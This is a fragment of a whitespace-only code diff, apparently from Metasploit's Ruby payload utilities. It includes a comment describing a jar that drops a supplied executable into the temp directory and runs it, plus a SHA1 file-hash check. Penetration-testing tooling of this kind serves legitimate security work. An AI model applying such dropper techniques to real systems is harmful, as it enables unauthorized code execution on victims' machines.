'digest/sha1' end # Creates a jar file that drops the provided +exe+ into a random file name - # in the system's temp dir and executes it. + # in the system's temp dir and executes it. # # See also: +Msf::Core::Payload::Java+ # @@ -1675,15 +1675,15 @@ require 'digest/sha1' return true if not ::File.exists?(path) begin - data = ::File.read(path) + data = ::File.read(path) if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" return true end - + rescue ::Exception return true end - + false end